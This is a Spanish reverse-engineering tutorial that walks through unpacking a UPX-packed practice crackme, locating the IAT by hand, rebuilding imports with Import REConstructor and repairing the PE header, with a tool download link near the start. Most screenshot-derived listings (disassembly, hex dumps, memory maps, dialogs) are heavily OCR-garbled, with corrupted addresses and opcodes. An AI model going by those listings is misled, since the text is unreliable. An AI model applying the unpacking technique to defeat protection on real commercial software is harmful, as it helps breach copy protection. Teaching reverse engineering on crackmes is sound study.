RECONSTRUCTOR, por supuesto no cerramos el OLLYDBG con el CC empacado con UPX 
detenido en el OEP, pues el IMP REC trabaja sobre el. 


http://www.ricnar456.dyndns.ore/HERRAMIENTAS/F-G-H-[-J-K/ImportReconstructorl 6f.zi 


user y pass:hola 


pueden bajarlo desde alli. 


Import REConstructor v1.6 FINAL (C) 2001-2003 MackT/uCF 


-Aáttach to an Active Process 


A cAdocume”1ricardosconfig”1Mtemprrartex00.438timportrec. exe (00000400) 
[ce 4archivos de programa winrartwinrar.exe [00000938 
c:idocuments and selttinasticardovescrtoriorescritorios071 -crackmetcrackme.exe (OODDOE 
c:4odbg110 finallparcheado 4.exe (OOODO8CC] 
c:4archivos de programa! techsmithsnagit 8Mtschelp.exe [(ODODO5E 4] 
c:4archivos de programa! techsmithisnagit 8h snagit32.exe [(OODOOFBO] 
c:4archivos de programa'yahoo!tmessenger'ypager.exe (00000948) 
ci4archivos de programatoperatopera.exe (00000E 18] 
cAshttpsv http. exe (ODODODCA] 
c:Windowssystem324svchost. exe (OOO004B8 


| Clear Log | 


147 Infos needed New Import Infos (IID+4SCI+LOADER]) | Options | 


OEP ¡00000000 187 AutoSearch | Ava [00000000 Size [00000000 


Exit | | 


Lo abrimos y buscamos el proceso del crackme de cruehead con UPX que esta detenido en el OEP. 


Ahora bien un tema que complica a muchisimos newbies es hallar el inicio y final de la IAT, por 
supuesto en el crackme que tenemos detenido en el OEP ya vimos que el packer destruyo la TT, por 
lo cual el primer Image Import descriptor cuyo 4 puntero marca el nombre de la dll y el 5to marca la 
primera entrada de la ¡at correspondiente a esa dll, no los tenemos, por lo cual debemos utilizar 
otros metodos para hallarla. 


Por supuesto sabemos que las llamadas a las apis generealmente son realizadas con JMPs indirectos 
o CALLs indirectos del tipo. 


JMP [xxxxxxx] o CALL [xxxxxx] 


y como hemos visto en la parte anterior el programa toma la direccion de la api en nuestra maquina 
de la IAT, que es el deposito de direcciones de las apis en nuestra maquina, busquemos un salto a 
una api en el empacado, para lo cual miremos en el OLLYDBG con el CC empacado, parado en el 
OPEP. 


ajex] eji] vis] et el] + 1jejmtiwajc//[x/8/r]--[s] ¿=/8/?] 


5A BB PUSH B 

90401002 Es FFo400Ba CALL MB401506 JMP to kernel32.GetModu leHandleA 
A3 CA20400B MOU DWORD PTR DS: [4026CA7,EAX 

5 5A Ba PUSH 

0040100E 68 F4204000 PUSH 4020F4 De ASCII need to disasm the codet” 

06401013 ES A6O40BBa JMP to UMER32.F indy indowA 

an461018 BBCO OR EAX, ERX 

BO04B1B1A | 74 Bl CRACKME. 66441010 

Bn4B1B1C C3 

a64B161D0|  C7405 64204990 1 MOU DWORD PTR DS: [402064], 4003 

a64B1627| C7405 68204900 ¿MOU DWORD PTR DS: [402068], 461128 

00401031 C705 60204900 1 MOU DWORD PTR DS: [4602060], 

ARAS) PFAR FAPAMARA (MM MUINAN PTR NS-Tár?a7Al A 


Alli en la segunda linea vemos un CALL que ollydbg nos dice que ira a una api, aunque previo paso 
por los JMPS INDIRECTOS, asi que marquemos esa linea y hagamos FOLLOW 


[€] File View Debug Options Window Help 


dx eu] vis] $0) e] + Ljejmjr[wu]c)/]k/B]R 


EA Bb PUSH 6 
AS cnsedoos — [MOU DUORD. PTA 4B20CF A 
6A 60 PUSH 6 Backup dl 
68 F4204000 [PUSH 4020F4 Copy » 
ES AGA4000B 


BECA OR EAX, EAX Binary 
74 01 pep pORT 80401910 | 
C3 Assemble Space 
C705 64204000 1M0U DWORD PTR DS: [402064 
C705 68204000 ¡MOU DWORD PTR DS:[402668 — Label : 
C705 60204090 1MOU DWORD PTR DS: [402060 ] 
C705 70204000 1MOU DWORD PTR DS:[462678 Comment ; 
al caza4oua MOU EAX, DWORD PTR DS:[4£ y int 

74204908 HOY, DINORO PTR DS: [402074 reakpoin 


Run trace 


PUSH EAX » 
D1030000 
78204000 — |MOU DWORD PTR DS: E 
907FOB0a  |PUSH 7FOD 
PA ei New origin here trl+Gray * 


Fil 
38324000 kerne 132, GetModu leHandleA 
3C324000 kernel 32.ReadFi le 

40324000 kernel32.ExitProcess 

43324000 COMCTL32. InitCommonControls 
40324000 COMCTL32. CreateToolbarEx 
50324000 COMCTL32. CreateToo!lbar 
53324000 GDI32.TextO0utA 

50324000 GDI32.StartPage 

60324000 GDI32.StartDocA 

64324000 GDI32.GetTextMetricsA 
68324000 GDI32.GetStockObject 
60324000 GDI32.EndPage 

70324000 GDI32.EndDoc 

74324000 GDI32.Delete0bject 
728324000 GDI32.DeleteDC 

20324000 COMDLG32. GetSaveF i leNameA 
84324000 COMDLG32. GetOpenF i leNameA 
88324000 COMDLG32.PrintDlgA 

ADO EVIE PTR DS: LERXI, AL 


MAN IIEIIANAEAITA 0 


Alli encontramos la tabla de saltos que tomando valores de la IAT, nos lleva a cada APL como 
vemos estos saltos comienzan con los opcodes FF 25, por lo cual muchas veces veran en tutes que 
directamente haces un search for bynary string y buscan FF 25, y llegan hasta aquí mas 
rapidamente. 


El tema es que no todos los programas usan saltos indirectos para llegar a las apis, por lo cual a 
veces ese metodo falla, pero lo mejor y que nunca falla es buscar una llamada a una api, y ver de 
donde toma el valor guardado que nos llevara a la api, y ese valor tiene que estar guardado en la 
IAT. 


Aquí en el ejemplo JMP [403238] 


seHandle 
WriteFile 


InmitC ommonC ontrols 
CreateToolbarEx 
CreateToolbar 


.¿GetModu leHandleA) 


+ 


29 B5 80 7C OE 18 86 A2 CA 81 7C 66 66 
DD 15 CS 58 21 9B C4 3B 8B Có6 53 66 aa 
26 Fi FO ES 49 F2 77 68 ES 


Alli esta bien claro 403238 es una entrada de la IAT donde esta guardada la direccion de la api 


GetModuleHandleA, de esta forma en el DUMP estamos viendo parte de la IAT, lo que 
necesitamos es ver donde comienza y donde termina la misma. 


Por supuesto mirar todos los JMPS INDIRECTOS y ver cual es la minima y maxima direccion 
podria ser un metodo, aunque es muy lento, lo mejor es ir al DUMP e ir subiendo de a poco, y como 
sabemos cada entrada tiene una direccion de una api, en este caso es 7C80B5329, que vista al reves 
es 29 B3 80 7c, cambiare a la vista de dos culumnas para que se aprecie mas. 


Address | Hgu_ dano J8SCIL 7] 


Alli vemos la organización de la TAT, vimos en la parte anterior que estan continuadas todas las 
entradas de la misma dll y luego la separacion para comenzar con la siguiente dll, es una entrada 
con ceros, si marcamos los ceros de separacion. 


| Address [Hex _dump_________Jascir_ |] 
2040323829 a 


QA 


Algunos packers mas sofisticados sobreescriben los ceros con basura para que se haga mas dificil la 
reconstruccion, total esas entradas no se usan, y como ya no necesita arrancar el programa, no 
necesita mantener los ceros, pero aquí estan y como ejemplo vemos que entre ellos en una misma 
dll las direcciones son cercanas ya que van a la misma seccion donde se encuentra esa dll, si ven 
abajo de 


00403238 29B5807C.  0E18807C )u€lttel 
00403240 A2 CA 81 7C 0000 00 00 


hay tres apis que van a direcciones 7CxXxxxxx y luego esta la entrada con los ceros que separa de la 
siguiente dll. 


Si vemos en VIEW-M veremos a que seccion CODE de que dll corresponden esas direcciones tipo 
TCOXXXXXK 


USER32. Trans lateMessage 
120ED99 | an dManiñ 


Pues alli vemos que todas esas direcciones estan comprendidas dentro de la seccion code de la 
kernel32.dll. 


77F41000| 0006C900] SHLWAPI | .text code, import! Imag|R RWE 
77FADOGO | B0BB100B| SHLWAPI | data data Imag|R RWE 
77FAEGOO| BOBBZ2000| SHLWAPI | .esro resources Imag|R RWE 
77FB0000| 006006990| SHLWAPI | .reloc relocations| Imag|R RWE 
7C38500000) 00001000 | kerne 132 PE header Imag|R RWE 
7C861000 00032000 kernel32 .text code, import: Imag R RWE 
7C33340 | B0BBSOBO|kernel32| .data data Imag|R RWE 
7C888 665073000 |kernel32| .rsro resources Imag|R RUE 
7CSFE 66005000 |kernel32| .reloc relocations| Imag|R RWE 
709100044 09901000|ntdl!l PE header Imag|R RWE 
7091 1AAA!ARAZRARA | ntril -TPART nade.eennrti Tmaa!l R RIF 


Por supuesto en sus maquinas las dll pueden estar ubicadas en otras direcciones, pero aquí veo que 
en mi maquina esas entradas corresponde a la seccion CODE de la kernel32.dll o sea que las 
direcciones de las entradas contiguas caen todas alli en esa dll. 


430. HEW 
ASIWBPEW 


( 
Y 


1515) 


Pues alli vemos todas las entradas correspondientes a la kernel32.dll, vemos la separacion con ceros 
marcada en rojo y mas arriba hay entradas que van a otra dll en este caso su seccion CODE se 
encuentra en direcciones cercanas a 77Dxxxxx, miremos en M, a que dll corresponden. 


77C34000| 00001000 | msvort ¿«PSrc resources Imag|R RUE 
77C35000| 006003000 | msuvcrt .reloc relocations| Imag|R RWE 
77D010000/| 009001000 | USER32 PE header Imag|R RWE 
77011000 0005FOG6 USERS2 «text code, import: Imag R RWE 
770798900 | 00BB2000| USERSZ «data data Imag|R RWE 
7D? B| 00B28006/ USER32 ¿«PSrG resources Imag|R RWE 
77D 60003000 | USERSZ .reloc relocations| Imag|R RWE 
77DA0040/ 090901000 | ADVAPISZ PE header Imag|R RWE 
77DA1000/ 00075000| ADVAPIS2! .text code, import: Imag|R RWE 


Pues entonces las direcciones que hay arriba de la separacion, corresponden a la seccion CODE de 
la user32.dll, sigamos subiendo hasta la siguiente separacion. 


) 
) 


Y 


DOE 


dado 


..««BlOw 
DADIW>3EW 
S3EWLFEw 
EAWbrxEW 
SlEWr EW 
* rowie'w 
4tEwS"Ew 
ZAbwW£: Ew 
¿DW =i5w 
3*Ewñ 10w 
EW. 10w 
€ Ll: 10 

MEW. A0w De 
*BEW"E0W 

CREDO Di 
FMEWPDEW 
+ADwidEw 
430. HEWw 
daiuBrEw 


aaa aa 
Ear 


DOE 
DO 


dt 


Pues alli vemos todas las apis que caen dentro de la seccion CODE de la user32.dll y la separacion 
pero arriba ya no hay mas nada quiere decir que el inicio de la ¡at es 403184, pues esa es la primera 
entrada valida. 


[Address [Hei dump_________ [ascIr | 
0403174| 60 


4 stc SF BTIWDADW 
C D2 7? >IEWFTEW 
LTEWEADw 
brEws EW 
roew" rów 
00 'wétEw 
5 "EWEA0w 


£: EW Ow 

+¡0wá-Ew 

ATOWIREw 
- 18wt Ei 
-T0WI1EW 
.AIW*DEW 
"EDWLREW 
DiblWEREW 
PbEw+A8w 


¡DOE 
DOS 


Di 
OBOBLOADADOAC) 


6 
1515] 
a 


E 
= 
El 

M=3 
Fr 


=D 
Eo IrDA 


ta—X 


Lee OOO, 
EXA 


Mhdadida DARIA CAUCA diari lindaa Darro Deanbrrda CERGRAO 


Vemos claramente mas arriba no hay mas entradas que vayan a ninguna dll, y en este caso, ademas 
hacia arriba hay todos ceros lo cual nos facilita la tarea de ver el inicio de la IAT, algunos packers 
mas complejos normalmente llenan de basura antes de la IAT y luego de que termine, para que no 
sea tan facil identificar el inicio, pero si uno sabe que las entradas de la IAT siempre deben ir a la 
seccion code de una dll, pues el resto en seguida nos damos cuenta lo que es basura, pues no nos 
lleva a ninguna seccion code de ninguna dll. 


Pues alli en la imagen vemos el inicio de la IAT que es 403184, ahora iremos bajando hasta hallar 
el final de la iat, usando el mismo metodo, mirando siempre que la IAT continuara mientras haya 
entradas que vayan a una seccion code de una dll. 


Tambien mas adelante veremos que hay packers que cambian entradas de la TAT y las redireccionan 
a rutinas propias, desde la cual saltan a la api, ese caso por supuesto no se da aquí, y lo 
estudiaremos mas adelante, pero por ahora, sabemos que las entradas de la IAT son direcciones de 
apis, y que deben llevarnos a secciones code de dlls. 


¿| ATEOS 
E 
ta-X5 13% 
yw 


Mo 
DO 


Do 
id 
DE 


$2 -wuI=w 
hó"wpa"w 
Fi -W0Ó-w 
=1"win"w 
a 
dl6u=FSu 

BD 00 00 00 ...ooo.. 
BB 00 00 66 BB 00 00 BA ....oo.. 
100 090 BOB 00 00 00 BO BO .....o.. 
AA AA CARA AAIAA AA AA AA! .......- 


B 
B 
B 


yl 


Lalola 
Y 


4 
4 
4 
4 
4 
4 
40 
4 
4 
4 
4 
4 


COMCTL32| .rsro resources Imag|R RWE 
COMCTL32| .reloc relocations| Imag|R RWE 
COMDLG32 PE header Imag|R RWE 
COMDLG32 .text code, import: Imag R RWE 
COMDLG32|.data data Imag|¡R RUE 
COMDLG32| .rsrc resources Imag|R RUE 
COMDLG32|.reloc relocations| Imag|R RUE 
comot 1_1 PE header Imag|R RWE 
77341000! 04B9DDDO!| comotl 1! .text code. import: Imaa!R RWE 


En este caso corresponden a la sección CODE de COMDLG32.dll y luego de esto no hay mas 
entradas asi que el final de la IAT para que queden todas las entradas incluidas dentro seria 40328C, 
podria tomarse tambien que la ultima entrada es 403288 y igual funcionara, pero para mas claridad 
vemos que termina en 40328c y ponemos esa direccion como fin de la IAT. 


Por lo tanto ya tenemos el inicio y final de la IAT 


INICIO: 403184 
FINAL: 40328C 


el IMPORT RECONTRUCTOR nos pide tres datos : 
1)el inicio de la IAT, pero hay que restarle a 403184 la imagebase que en este caso es 400000 asi 
que seria 3184. 


2) El segundo valor que nos pide es el largo de la IAT por lo cual restando el FINAL menos el 
INICIO tendremos el largo. 

LARGO=40328c-403184=108 

por lo cual el segundo dato que nos pide del largo o SIZE sera 108 


3)El tercer dato es el OEP tambien restandole la imagebase seria 401000-400000=1000 


PUSH A 


0045 CALL 00401506 JMP to kerne132.GetModu leHandleA 
15515] MOV OWORD PTR DS: [4020CA],EAX 

Bn4B PUSH 

6040 PUSH 4020F4 ASCII "No need to disasm the code?” 
aBn40 JMP to USER32.FindWindowA 

0045 OR EAX. EAX 


DEP [00001000 [87 AutoSearch F 


RAVA E 84 Size [00001 08] 


Load Tree | Save Tree | Get Imports 


Alli vemos lso daros que pusimos en el IMP REC, en OEP pusimos el 1000 ya que a 401000 le 
restamos la imagebase, en RVA el inicio de tabla restandole la imagebase tambien y en Size el 
largo de la IAT. 


Ahora apretamos GET IMPORTS 


importea runcuons FoOuna 
user32. dll FT hunk:00003184 NbFunc:25 [decimal:37] valid: YES 
kemel32. dll FT hunk:0000321C NbFunc:A, (decimal: 10] valid:YE *x 
comectl32. dll FThunk:00003248 NbFunc:3 [decimal:3] valid: YES 
adi32.dll FThunk:00003258 NbFunc:9 (decimal: 9] valid: YES 
comdla32. dll FThunk:00003280 NbFunc:3 (decimal:3] valid: YES 


+44) 4-- E 


Vemos que el IMP REC lo que hace es hallar que apis pertenece a cada entrada de la IAT, y ademas 
de hallarla, te comunica si es valida o sea si esta correcta, marcando YES, en el caso de entradas 
redireccionadas por ciertos packers que no vayan directamente a una API te mostrara NO y en ese 
caso habra que averiguar esa entrada incorrecta a que api pertenece realmente, arreglarla para que el 
IMP REC reconozca como entrada correcta y nos diga YES y una vez que esta todo YES como en 
el caso actual ya podemos reparar el dumpeado. 


Antes de hacerlo como nos gusta mirar, veremos que en cada dll, si desplegamos el contenido 
apretando en el +. 


Imported Functions Found 


SB user32. dll FThunk:00003184 NbFunc:25 (decimal: 37] valid: YES 
rya:D0003184 mod:user32. dll ord:01B3 name:KillTimer 


rva:00003188 mod:user32. dll ord:015£ name:GetSystembetrics 
rva:D000318C mod:user32. dll ord:0188 name:LoadCursorá, 
rya: 00003190 mod:user32. dll ord:0184 name:Loadácceleratorsá, 
rya:D00003194 mod:user32.dll ord:01DC name: MessageBeep lo 
rya:D00003198 mod:user32. dll ord:0175 name:GetW'indowRect 
rva:0000319C mod:user32. dll ord:01C9 name:LoadStringá, 

En rva:00003140 mod:user32. dll ord.018C name:Loadlconá, 


Tenemos cada entrada a que api pertenece y si tenemos ganas podemos ubicar la primera que vimos 
en la IAT que era la entrada correspondiente a GetModuleHandleA. 


004D14FA 
00401500 25 
06401506 FF25 

60401580 25 3 


 GetModu leHandleA 
«ReadFile 


aa4a152 24 
AB4B152A 
66401530 
ARAaAIEDE, 


32. GetModu leHand 


BE 18 86 7C A2 CA 81 7C 06 Bb 
3 21 9B C4 58 
5 2 BC EF 77/26 Fi FO 77|E9 49 F2 77/68 ED 


1 £1 EE 22íFa mn Ena 27ic1 Era Ena 77: 29n £r 


EC 727 iD=": A pa 


Si recuerdan esa fue la primera entrada que miramos en la IAT la correspondiente a 403238, por 
supuesto en IMP REC siempre hay que restar la imagebase por lo cual buscaremos 3238 ademas 
sabemos que pertenece a Kernel32.d1l como vemos en la imagen superior al lado del nombre de la 


apl. 


Imported Functions Found 


+ user32.dll FT hunk:00003184 NbFunc:25 (decimal: 37] valid: YES 


EN kernel32. dll FThunk:0000321C NbFunc:4, (decimal:10] valid: YES 
»: omctl32. dll FThunk:00003248 NbFunc:3 [decimal:3] valid YES 
+ gdi32. dll FT hunk:00003258 NbFunc:9 (decimal: 9] valid: YES 

+- comdlg32. dll FT hunk:00003280 NbFunc:3 (decimal: 3] valid YES 


Por lo tanto debemos abrir la kernel132.dll y para ello hacemos click en el + que esta a la izquierda. 


Imported Functions Found 


SP kkemnel32. dll FThunk:0000321C NbFunc:4, (decimal:10] valid: YES 
rya:0000321C mod:kernel32. dll ord:0168 name:GetLocalTime 


rva:00003220 mod:kemnel32. dll ord:026£ name:OpenFile 

rva:D00003224 mod:kemel32. dll ord:01F2 name:GlobalFree 

rva:00003228 mod:kemel32. dll ord:01£B name:Globalálloc | 
rva:D0000322C mod:kernel32. dll ord:03B3 name: Istrlen 

rva:D00003230 mod:kemnel32. dll ord:0032 name: CloseHandle 

¿00003234 mod:kemnel32. dll ord:038C name:WriteFile 

14300003238 mod:kemel32. dll ord:0176 name:GetModuleHan 


Alli vemos la entrada 3238 corresponde a GetModuleHandleA esta todo bien, asi que ahora 
repararemos el dumpeado, vamos al boton FIX DUMP. 


Buscar en: [Se 01-Crackme y] e“ E e Ed- 


- [E] crackme.ExE 
a Dumped.exe 


ocumentos 
recientes 


me; 


Escritorio 


7 D 


is documentos 


| 
== MiPC 


a. Nombre: [Dumped.exe ” ] 
is sitios de red Tipo: [PE files (exe, * dll) 5 ] Cancelar 


[Abrir como archivo de sólo lectura 


Alli buscamos el dumpeado y lo abrimos 


Fixing a dumped file... 

5 (decimal: 5) module(s] 

3E (decimal:52) imported function(s]. 

New section added successfully. RWA:D0D0B000 S12E:00001000 
e Import Descriptor size: 64: Total length. 450 

ADocuments and SettinastRicardoEscritorio.ESCRITORIOA01-CrackmetDumped .ex 


'» 


[56 


Bueno alli vemos que el IMP REC lo repara aunque no toca el DUMPED que teniamos guardado 


sino que crea uno reparado con el nombre DUMPED_.exe. 


Veamos alli en la carpeta donde esta. 


y 17 F4 ' busqueda Yo Carpetas sa |” 


uments and Settings|RicardolEscritorio(ESCRITORIO(01-Crackme 


CRACKME, EXE Dumped.exe 


wo y carpeta ES 


1bre a este 
archivo 
archivo ML 
: archivo en Web PS 

¡A! 


Alli esta podemos intentar ejecutarlo a ver si quedo bien. 


C:Wocuments and SettingsiRicar doWEscritorio1ESCRITORIOW1 -CrackmeWDumped.exe E 


Q C: Documents and Settings|RicardolEscritorio_ESPRITORIO(01-CrackmeiDumped.exe no es una aplicación Win32 


válida, 


Jejejejeje aun parece que falta algo pero a no asustarse que al reparar la IAT muchas veces nos 
ocurrira esto, el mismo PE TOOLS tiene la solucion abrimos el PE TOOLS 


EX PE Tools v1.5 Xmas 
File AGE Plugins Option: 
(9) — PE Editor 


Patl 


£ HET 
'D C Break 8: Enter 
E i 


PE Sniffer 


Dumper Server 


Y vamos a REBUILD PE y buscamos el DUMPED_.EXE y lo repara perfectamente ahora lo 
ejecutamos yy yy... 


CrackMe v1.0 


Funcionaaaaaaaaaa y ademas funcionara en cualquier maquina, porque hemos reparado la IAT, de 


forma que el IMP REC lo que hace es teniendo las apis correctas de cada entrada de la IAT, 
reescribe los punteros a los nombres de las apis, y arregla la IT poniendo un IID por cada dll como 
vimos en la parte anterior que debe quedar todo programa para que arranque normalmente sin error. 


Si abrimos el DUMPED_.exe en OLLYDBG. 


Open 32-bit executable 


Buscar en: [O 01-Crackme +! e E e EX 


[5] CRACKME.EXE 
]Dumped.exe 


Fecha de creación: 05/03/2006 10:23 
Tamaño: 37,0 KB 


Nombre: [Dumped_.exe 


Tipo: Executable file (*.exe] y Cancelar | 
Arguments: | Y 


Entry Point Alert 


Module 'Dumped_' has entry point outside the code (as specified in the PE header), Maybe this file is self-extractimg 
or self-modifying. Please keep it in mind when setting breakpoints! 


h 


Vemos que OLLYDBG nos dice ahora que el Entry Point, se encuentra fuera de la seccion code y 
eso es porque el UPX habia cambiado la seccion code a la 3ra, igual podemos arreglar eso. 


CM TU EPSE ESPE al +] 1jejmjr[wju[c]7[x]8/r]-/s] ¿51512 


ÉS FFO49090 CALL Bogo1506 <JMP.tkerne 132. GetModu leHandleA> 
As Cca2zo40na MOU DWORD PTR DS: [4020CA],EAX 
6A Ba PUSH A 


638 F4204000 PUSH 4020F4 ASCII "No need to disasm the codet” 
ES A60490008 CALL _064014BE <JMP.tuser32.FindWindowA> 

BECA OR EAX, EAX 

24 al Dumped_.0049101D 


C70s 64204000 (MOU DWORD PTR DS: [482064], 4993 
C795 68204000 ¡MOU DWORD PTR DS: [402068], 401128 


Llegamos al Entry Point y vamos a ver el header con GOTO EXPRESSION=400000 


Enter expression to follow in Dump 


400000 v ] 


Cancel 
N 


M2P.8... 
04 00 OF 00 FF FF 00 00/4.%. .. 
Es 00 00 00 00 00 60 BO |O....... 
40 60 198 00 090 60 00 00 B.+..... 
00 60 00 60 00 0 00 BO ...ooo.. 
06 60 00 60 00 60 00 00 ....oo.. 


in32..57 
00 60 00 60 00 0 DO BO ..oooo.. 
158 45 69 BB 4C 61 M4 BO PE; -LO0. 


SA 56 06 02 66 4b 
BO OF 00 FF FF 00 
Bo 00 09 06 06 aa 
Bo 1A 00 09 0n ES 


Backup » 
Searchfor >» 


Goto Mool=+s 
A This pro 


gram mus 
y Hex t be run 


under 
Text in32..$7 


Short PE :LÓS: 
Long ca 
Float 3084 
Disassemble 


pur 


urnas 
Appearance Ba|.t...e.. 


aaa o aaa tao 


DOS EXE Signature 
DOS_PartPag 56 
DOS_PageCnt 
DOS_ReloCnt 
DOS_HdrSize 
DOS_MinMem = F (15,) 
DOS_MaxMem = FFFF (65535. ) 
DOS_Re loss 
DOS_ExeSP = BS 
DOS_ChkSum = B 


(88. ) 
B 


DOS_TablOff = 40 
DOS_Overlay = 1A 


Alli esta bajamos 


Offset to PE signature 


BA 
DB 10 
DB 08 


[sl] DE 00 
56 45 60 M1 ASCII PE” PE signature (PE 
4C61 DW 614C Machine = IÑASE-FILE_MACHINE_1386 
400 Dl 6004 NumberOfSect ions = 
29240904 |DD BAD9I2429 TimeDateStamp = AD92429 
606000009  |DD 60B0B0BBama PointerToSymbo lTable = 8 
60600009 ¡DD 460BBBAAa NumberOfSymbols = B 
[151515] Dll GEO Size0fOptionalHeader = EB ([ 
j sFa1 DW s1sF Characteristics = EMECUTABLE. ÍMAGE! 32BIT_MACHINE ¡RE 
a 6BO1 Dl 610B MagicHNumber = PE32 
a Al 62 DB 62 MajorlLinkerVersion = 2 
a 19 DB 19 MinorLinkerVersion = 19 (25.) 
a C/ 66100668 |DD 1046BB1BDn SizeDfCode = 1000 (4096. ) 
a ó6/ 661006688 |DD 4000B100n Size0fInitializedData = 1000 (4096, ) 
a 4| 66899998 |DD 404BBSOBa Size0fUninitializedData = 3600 (32768. ) 
2/  BB1000066  |DD 00001606 AddressOfEntryPoint = 1000 
66900009 |DD 60BB90Ba BaseOfCode = 9000 
a 66AB0000 ¡DD 4BBBADOS BaseOfData = ABBB 
a 600064009 |D0D 66400000 ImageBase = 400000 
a 66100000 |DD 66BB1OOO SectionAlignment = 1000 
B04BBBEC|  BBB20000_ |DD 0BBBBZOB FileAlignment = 200 


Alli esta el puntero maldito dice BASE OF CODE=9000 o sea queremos que la seccion CODE sea 
la primera, la que empieza en 401000 asi que cambiamos ese 9000 por 1000. 


o 


MOU DWORD PTR DS:[402080],5 Co 
MOU DWORD PTR DS:[402034],402110 A py 
MOU DWORD PTR DS:[4020388],4920F4 Al Binary 
PUSH 402064 


CALL aB401488 ¿ 
PUSH 6 AE | 
PUSH DUORD PTR DS: 4826CA] Label 


PUSH B Breakpoint 

Search for 

Find references 

View executable file 
Copy to executable file 


J 


NO Y 40 50 


OD 


Go to 
DE 00 
ASCII ”PE” PE signature (PE) Hex 
DW 6140 Machine = IMAGE_FILE_MACH 
DW 6004 NumberOfSections = 4 Text 
29240904 |DD BAD92429 TimeDateStamp =_AD92429 Short 
(5151515/5]5]5]5] jus ls15151515]515) PointerToSymbolTable = MB or 
(5]5/5/5]5151515] 15J5]s]515151515) NumberO0fSymbols = BM | Lon 
SizeO0fOpt ionalHeader = E g 
Characteristics = EXECUT Float 


MagicNumber = PE32 
MajorLinkerVersion = 2 Disassemble 


9 ql MinorLinkerUersion = 19 

a 661606000 |DD 6O6BB1ODO Size0fCode = 1000 (4096. v Special 
0040 60100000 DD 60001000 Size0fInitializedData = 
0040 66300000 |D0D Ba6BBSanO Size0fUninitializedData 
ABIDADA: pa100008_ |DD BBBB1ODa pddressOfEn+tcsPo los = 16 Appearance 
004000 66900000  |D0D 64BB9aDa BaseDflode = Y 

40 z 6BABBBBA |D0D BBBBADOS BaseOflata = AG00 
2049 pe004a0s  |DD sesabasa InageBase = 400990 


Lo marcamos y vamos a MODIFY INTEGER. 


Modify dword at 00400... [XX] 


Hexadecimal [00001 00d 1 
Signed 4036 
Unsigned [4096 


PE signature (PE) 
Machine = IMAGE_FILE_MACHIME_ 138€ 


400 BBB4 NumberOfSections = 4 

29240904 BAD92429 TimeDateStamp =_AD92429 
(51515]5]5]5]5]5] (9J51515/5]5]5]5] PointerToSymbolTable = MB 
(sJals/5]5151515) (5/5/5/s15151515] NumberOfSymbols = O 

[151515] BBEO SizeO0fOpt ionalHeader = E6 (224,) 
sFe1 81s8F Characteristics = EXECUTABLE_ IMF 
(5]=1581 B10B MagicNumber = PE32 

B2 B2 / MajorlLinkerVergion = 

19 A . MinorLinkerVerdion = 19 (25.) 
690100000 lalalala pololo! Me Size0fCode = 1 (4096. ) 
00100000 (alslalopWa]=T” ME Size0fInitiali Data = 1000 (4£ 
(sl9f=15]5]5]515] (slalalaf=15] SizeO0fUninitia dData = S406 ( 
00100000 60BB1O AddressOfEntry nt = 1000 


00108000 (00 00081008 BasedfCode = 1000 
AOABAGOD AODBAGOD Base0fData = ABBA 
000B4000 0040000 ImageBase = 400000 
00100000 60001600 SectionAlignment_=_1008 


Ahora guardaremos los cambios como siempre click derecho COPY TO EXECUTABLE y en la 
ventana que se abre click derecho SAVE FILE. 


LO TODD 


View executable file 
-cutable file 


0004 Text 

29240904 |DD BAD9I2429 Short 
606000009 ¡0D 40BBBOBn 
60090009  |D0D0 40BBBaBa Long 
En SS ¡ 
(158 Di 610B ES 
02 DB 02 | Disassemble 
19 DB 19 | 
66100000 ¡DD 666B1000 | Y Special 
66160000 ¡DD 66BB1ODa | 
66s60000 |D0D B6BBSODa | 
ó6b166B60a |D0D BO6BB1OOA Appearance 

o100008 |DD G0Ba1GBn 
66ABB0000  |D0D0 BBBBADOO BaseOflata = ABBB 
ARARSARA DO ARTARARA TmaorRase 2 4MAARAAA 


als 5 Base ode 

(s]5151515] [51515] BaseDfData 
500004000 100400000 ImageBase = 400000 
00100000 500001000 SectionAlignment 
B0B20000 15JsJ5]5]5)1515] FileAlignment = 2 
MajorOSVersion = 
MinorOSUersion = 1! 


Backup 
Copy 


gADO gBBA 
5151515151515] ls 151151515] 


deseas 0D Segaa3is mod, 
aganaVdn caBnaada Modify integer 
0008 0000 Search for 

00001000 00190090 
DO200000 00002000 
00BB1000 00100006 Go to offset Ctri+G 


pModule = NULL 
GetModu leHandleA 


Title = NULL 
(stas "No need to disasm the codet” 
FindWindowA 


Dumped_.90451610 


MOU DWORD PTR DS: [4020CA],EAXx 
PUSH O 

PUSH 4020F4 

OR ERX, EAX 


" 


34 MOV DWORD PTR DS: [402064], 4003 
DS: [402068], 461128 
DS: [40206C],0 

DS: [4020701,0 

PTR_DS: [4020CA] 
DS: [402074], EAXx 


hInst => NULL 


[Fins = 100. 
LoadIconA 


CALL B0401428 
MOU DWORD PTR DS: [402078], EAX 
PUSH 7FOB 


srcName = IDC_ARRON 
[ ¿t = NULL 
CALL B040149A LoadCursorA 
MOU DWORD PTR DS: [46207C],EAX 


DS: [4020801,5 
DS: [402034], 402110 SCII "MENU" 
DS: [402088], 4020F4 ASCII "No need to disasm 


PUSH 402064 [penacias = Dumped_.B 
CALL 66401488 


RegisterClassA 


Ahora reiniciamos y vemos que no solo no sale el cartelito molesto, si no que tambien OLLYDBG 
analiza la seccion ya que al interpretarla como CODE, le realiza el analisis, lo cual suele ser de 
mucha ayuda. 


4 


50380000 | OOBB3ODA Map |R R AevicerHarddis 
B03C0000 | 00BB4BDO Priv| Ri Ru 
590300000 | BOBBZ2000 Map ¡R R 
BO03F0000 | BBBBZ2000 Map |R R 
60400000 / 09991000| Dumped_ PE header Imag|R RWE 
60401000 006068990 | Dumped_ | UPXO code, export: Imag|R RWE 
90499900 | 699001000 | Dumped_ |UPX1 Imag|R RWE 
580409000/ 60961000 | Dumped_ | .rsro data, resouii Imag|R RWE 
60408000 060001000 / Dumped_ | .mackt imports Imag|R RWE 
00410000 | OBBBABOO Map ¡RE RE 
90400000 | 0OBB2000 Map ¡RE RE 
004E0000/ 00103000 Mao |R R 


Si vamos a ver las secciones del dumpeado veamos que para repararlas el IMP REC le agrega una 
seccion nueva llamada mackt donde colocara la nueva I'T, comprobemoslo, en el mismo header en 
modo SPECIAL vayamos a ver el puntero a la I'T. 


) 


DD 00BBBBBa CheckSum = 6 
DW 6002 Subsystem = IMAGE _SUBSYSTEM_WINDOWS_ GUI 
015151515] DLLCharacteristics = 0 


pepG16BÉ |D0D 06160606 SizeDfStackReserve = LE E J 
j poz0B6B6G [DD 06BBZ006 SizeO0fStackCommit = 2000 
